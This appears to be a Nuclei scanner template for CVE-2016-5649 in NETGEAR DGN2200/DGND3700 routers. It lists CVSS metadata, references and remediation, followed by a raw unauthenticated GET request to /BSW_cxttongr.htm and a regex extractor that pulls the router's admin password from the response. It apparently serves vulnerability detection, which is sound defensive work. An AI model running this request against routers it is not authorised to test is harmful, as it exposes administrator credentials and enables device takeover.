id: CVE-2016-5649 info: name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure author: suman_kar severity: critical description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. remediation: | Update the router firmware to the latest version, which includes a fix for the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2016-5649 - https://packetstormsecurity.com/files/140342/Netgear-DGN2200-DGND3700-WNDR4500-Information-Disclosure.html - http://packetstormsecurity.com/files/152675/Netgear-DGN2200-DGND3700-Admin-Password-Disclosure.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-5649 cwe-id: CWE-319,CWE-200 epss-score: 0.15148 epss-percentile: 0.95234 cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netgear product: dgn2200_firmware tags: cve,cve2016,iot,netgear,router,packetstorm http: - raw: - | GET /BSW_cxttongr.htm HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 matchers-condition: and matchers: - type: word part: body words: - "Smart Wizard Result " - type: status status: - 200 extractors: - type: regex name: password group: 1 regex: - 'Success "([a-z]+)"' part: body # digest: 4a0a00473045022069f2ab0b78e0dfad8d7d44e2c8ceee63d9580c521f0e4575eb37c89c261abb05022100e69e009670fb3112544739bfee15319f935849b33c39e2593dcda2bca0d9f165:922c64590222798bb761d5b6d8e72950